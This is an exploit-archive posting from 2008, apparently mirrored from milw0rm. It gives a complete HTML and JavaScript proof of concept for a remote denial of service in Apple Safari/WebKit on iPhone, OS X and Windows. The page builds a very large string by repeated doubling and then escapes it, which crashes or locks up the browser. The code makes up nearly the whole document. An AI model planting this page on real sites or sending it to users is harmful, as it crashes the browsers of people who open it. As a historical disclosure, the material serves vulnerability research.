Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win)
来源: 作者:Georgi 发布时间:2008-03-18
<!-- Even though Georgi Guninski retired from the scene, his old code is still finding new bugs.
iphone fw:1.1.4 : locks up safari win32 : crashes safari osx : crashes
looped the x's on milw0rm to find the bug. original firefox vuln: /str0ke -->
<html> Copyright Georgi Guninski <br> Cannot be used in vulnerability databases <br> Especially securityfocus/mitre/cve/cert <script> var s=String.fromCharCode(257); var ki=""; var me=""; for(i=0;i<1024;i++) {ki=ki+s;} for(i=0;i<1024;i++) {me=me+ki;} var ov=s; for(i=0;i<28;i++) ov += ov; for(i=0;i<88;i++) ov += me;
alert("done generating"); var fuckbill=escape(ov); alert("done escape"); alert(fuckbill); </script> </html>
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